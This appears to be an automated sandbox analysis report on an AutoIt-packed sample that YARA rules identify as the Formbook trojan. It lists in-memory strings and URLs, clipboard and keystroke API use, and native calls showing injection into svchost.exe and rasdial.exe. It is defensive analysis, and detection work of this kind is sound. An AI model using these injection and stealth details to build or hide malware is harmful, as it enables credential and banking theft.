            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/acerca-de/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/blog/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/comments/feed/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/contacto/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/feed/
            Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/wp-json/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/xmlrpc.php?rsd
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000064D6000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000004696000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://tilda.cc
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/wordpress
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wordpress.org/
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/explore/tags/wordcamp/
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000EEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_000EEAFF
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000EED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_000EED6A
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000DAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_000DAA57
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_00109576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00109576

            E-Banking Fraud

            Source: Yara matchFile source: 1.2.svchost.exe.2680000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2680000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.2680000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.2680000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 031215-Revised-01.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: 031215-Revised-01.exe, 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_bbf011ed-9
            Source: 031215-Revised-01.exe, 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7f1904c6-e
            Source: 031215-Revised-01.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ffdf8c10-6
            Source: 031215-Revised-01.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_af2234c7-a
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02681957 NtProtectVirtualMemory,1_2_02681957
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026AC1A3 NtClose,1_2_026AC1A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172B60 NtClose,LdrInitializeThunk,1_2_03172B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03172DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03172C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031735C0 NtCreateMutant,LdrInitializeThunk,1_2_031735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03174340 NtSetContextThread,1_2_03174340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03174650 NtSuspendThread,1_2_03174650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172B80 NtQueryInformationFile,1_2_03172B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BA0 NtEnumerateValueKey,1_2_03172BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BF0 NtAllocateVirtualMemory,1_2_03172BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BE0 NtQueryValueKey,1_2_03172BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AB0 NtWaitForSingleObject,1_2_03172AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AD0 NtReadFile,1_2_03172AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AF0 NtWriteFile,1_2_03172AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F30 NtCreateSection,1_2_03172F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F60 NtCreateProcessEx,1_2_03172F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F90 NtProtectVirtualMemory,1_2_03172F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172FB0 NtResumeThread,1_2_03172FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172FA0 NtQuerySection,1_2_03172FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172FE0 NtCreateFile,1_2_03172FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172E30 NtWriteVirtualMemory,1_2_03172E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172E80 NtReadVirtualMemory,1_2_03172E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172EA0 NtAdjustPrivilegesToken,1_2_03172EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172EE0 NtQueueApcThread,1_2_03172EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172D10 NtMapViewOfSection,1_2_03172D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172D00 NtSetInformationFile,1_2_03172D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172D30 NtUnmapViewOfSection,1_2_03172D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DB0 NtEnumerateKey,1_2_03172DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DD0 NtDelayExecution,1_2_03172DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172C00 NtQueryInformationProcess,1_2_03172C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172C60 NtCreateKey,1_2_03172C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172CA0 NtQueryInformationToken,1_2_03172CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172CC0 NtQueryVirtualMemory,1_2_03172CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172CF0 NtOpenProcess,1_2_03172CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173010 NtOpenDirectoryObject,1_2_03173010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173090 NtSetValueKey,1_2_03173090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031739B0 NtGetContextThread,1_2_031739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173D10 NtOpenProcessToken,1_2_03173D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173D70 NtOpenThread,1_2_03173D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D14650 NtSuspendThread,LdrInitializeThunk,6_2_04D14650
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D14340 NtSetContextThread,LdrInitializeThunk,6_2_04D14340
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04D12CA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04D12C70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12C60 NtCreateKey,LdrInitializeThunk,6_2_04D12C60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12DD0 NtDelayExecution,LdrInitializeThunk,6_2_04D12DD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04D12DF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04D12D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04D12D30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04D12EE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04D12E80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12FE0 NtCreateFile,LdrInitializeThunk,6_2_04D12FE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12FB0 NtResumeThread,LdrInitializeThunk,6_2_04D12FB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12F30 NtCreateSection,LdrInitializeThunk,6_2_04D12F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12AD0 NtReadFile,LdrInitializeThunk,6_2_04D12AD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12AF0 NtWriteFile,LdrInitializeThunk,6_2_04D12AF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04D12BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04D12BE0
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D12BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D12B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D135C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D139B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D12CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D12CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D12C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D12DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D12D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D12EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D12E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D12F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D12FA0 NtQuerySection
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D12F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D12AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D12B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D13090 NtSetValueKey
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D13010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D13D70 NtOpenThread
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04D13D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02BD8FF0 NtDeleteFile
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02BD8F00 NtReadFile
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02BD8DA0 NtCreateFile
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02BD9090 NtClose
Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02BD91E0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\031215-Revised-01.exe Code function: 0_2_000DD5EB CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\031215-Revised-01.exe Code function: 0_2_000D1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\031215-Revised-01.exe Code function: 0_2_000DE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\031215-Revised-01.exe Code functions (address only, no resolved API): 0_2_0007CAF0, 0_2_000E2046, 0_2_00078060, 0_2_000D8298, 0_2_000AE4FF, 0_2_000A676B, 0_2_00104873, 0_2_0009CAA0, 0_2_0008CC39, 0_2_000A6DD9, 0_2_0008B119, 0_2_000791C0, 0_2_00091394, 0_2_00091706, 0_2_0009781B, 0_2_00077920, 0_2_0008997D, 0_2_000919B0, 0_2_00097A4A, 0_2_00091C77, 0_2_00097CA7, 0_2_000FBE44, 0_2_000A9EEE, 0_2_00091F32, 0_2_01393640
Source: C:\Windows\SysWOW64\svchost.exe Code functions (address only, no resolved API): 1_2_02698363, 1_2_02681280, 1_2_026810CF, 1_2_026810D0, 1_2_026829ED, 1_2_026829F0, 1_2_0268FEA3, 1_2_02682E90, 1_2_026AE743, 1_2_0268DF23, 1_2_0268FC7B, 1_2_0268FC83, 1_2_02696543, 1_2_031FA352, 1_2_032003E6, 1_2_0314E3F0, 1_2_031E0274, 1_2_031C02C0, 1_2_031DA118, 1_2_03130100, 1_2_031C8158, 1_2_032001AA, 1_2_031F41A2, 1_2_031F81CC, 1_2_031D2000, 1_2_03164750, 1_2_03140770, 1_2_0313C7C0, 1_2_0315C6E0, 1_2_03140535, 1_2_03200591, 1_2_031E4420, 1_2_031F2446, 1_2_031EE4F6, 1_2_031FAB40, 1_2_031F6BD7, 1_2_0313EA80, 1_2_03156962, 1_2_0320A9A6, 1_2_031429A0, 1_2_0314A840, 1_2_03142840, 1_2_031268B8, 1_2_0316E8F0, 1_2_03160F30, 1_2_031E2F30, 1_2_03182F28, 1_2_031B4F40, 1_2_031BEFA0, 1_2_03132FC8, 1_2_031FEE26, 1_2_03140E59, 1_2_03152E90, 1_2_031FCE93, 1_2_031FEEDB, 1_2_031DCD1F, 1_2_0314AD00, 1_2_03158DBF, 1_2_0313ADE0, 1_2_03140C00, 1_2_031E0CB5, 1_2_03130CF2, 1_2_031F132D, 1_2_0312D34C, 1_2_0318739A, 1_2_031452A0, 1_2_0315B2C0, 1_2_0315D2F0, 1_2_031E12ED, 1_2_0320B16B, 1_2_0312F172, 1_2_0317516C, 1_2_0314B1B0, 1_2_031EF0CC, 1_2_031470C0, 1_2_031F70E9, 1_2_031FF0E0, 1_2_031FF7B0, 1_2_03185630, 1_2_031F16CC, 1_2_031F7571, 1_2_031DD5B0, 1_2_032095C3, 1_2_031FF43F, 1_2_03131460, 1_2_031FFB76, 1_2_0315FB80, 1_2_031B5BF0, 1_2_0317DBF9, 1_2_031FFA49, 1_2_031F7A46, 1_2_031B3A6C, 1_2_031DDAAC, 1_2_03185AA0, 1_2_031E1AA3, 1_2_031EDAC6, 1_2_031D5910, 1_2_03149950, 1_2_0315B950, 1_2_031AD800, 1_2_031438E0, 1_2_031FFF09, 1_2_03141F92, 1_2_031FFFB1, 1_2_03103FD2, 1_2_03103FD5, 1_2_03149EB0, 1_2_031F1D5A, 1_2_03143D40, 1_2_031F7D73, 1_2_0315FDC0, 1_2_031B9C32, 1_2_031FFCF2
Source: C:\Windows\SysWOW64\rasdial.exe Code functions (address only, no resolved API): 6_2_04D8E4F6, 6_2_04D92446, 6_2_04D84420, 6_2_04DA0591, 6_2_04CE0535, 6_2_04CFC6E0, 6_2_04CDC7C0, 6_2_04D04750, 6_2_04CE0770, 6_2_04D72000, 6_2_04D981CC, 6_2_04DA01AA, 6_2_04D941A2, 6_2_04D68158, 6_2_04CD0100, 6_2_04D7A118, 6_2_04D602C0, 6_2_04D80274, 6_2_04DA03E6, 6_2_04CEE3F0, 6_2_04D9A352, 6_2_04CD0CF2, 6_2_04D80CB5, 6_2_04CE0C00, 6_2_04CDADE0, 6_2_04CF8DBF, 6_2_04D7CD1F, 6_2_04CEAD00, 6_2_04D9EEDB, 6_2_04D9CE93, 6_2_04CF2E90, 6_2_04CE0E59, 6_2_04D9EE26, 6_2_04CD2FC8, 6_2_04D5EFA0, 6_2_04D54F40, 6_2_04D00F30, 6_2_04D82F30, 6_2_04D22F28, 6_2_04D0E8F0, 6_2_04CC68B8, 6_2_04CE2840, 6_2_04CEA840, 6_2_04CE29A0, 6_2_04DAA9A6, 6_2_04CF6962, 6_2_04CDEA80, 6_2_04D96BD7, 6_2_04D9AB40, 6_2_04CD1460, 6_2_04D9F43F, 6_2_04D7D5B0, 6_2_04D97571, 6_2_04D916CC, 6_2_04D9F7B0, 6_2_04CE70C0, 6_2_04D8F0CC, 6_2_04D970E9, 6_2_04D9F0E0, 6_2_04CEB1B0, 6_2_04DAB16B, 6_2_04D1516C, 6_2_04CCF172, 6_2_04CFB2C0, 6_2_04D812ED, 6_2_04CFD2F0, 6_2_04CE52A0, 6_2_04D2739A, 6_2_04CCD34C, 6_2_04D9132D, 6_2_04D9FCF2, 6_2_04D59C32, 6_2_04CFFDC0, 6_2_04D91D5A, 6_2_04CE3D40, 6_2_04D97D73, 6_2_04CE9EB0, 6_2_04CA3FD2, 6_2_04CA3FD5, 6_2_04CE1F92, 6_2_04D9FFB1, 6_2_04D9FF09, 6_2_04CE38E0, 6_2_04D4D800, 6_2_04CE9950, 6_2_04CFB950, 6_2_04D75910, 6_2_04D8DAC6, 6_2_04D25AA0, 6_2_04D7DAAC, 6_2_04D81AA3, 6_2_04D9FA49, 6_2_04D97A46, 6_2_04D53A6C, 6_2_04D55BF0, 6_2_04D1DBF9, 6_2_04CFFB80, 6_2_04D9FB76, 6_2_02BC1BF0, 6_2_02BBCB70, 6_2_02BBCB68, 6_2_02BBAE10, 6_2_02BBCD90, 6_2_02BC5250, 6_2_02BDB630, 6_2_02BC3430, 6_2_04B8E70C, 6_2_04B8D778, 6_2_04B8E258, 6_2_04B8E373
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03187E54 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0312B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03175130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 031BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 031AEA12 appears 86 times
Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 04D4EA12 appears 86 times
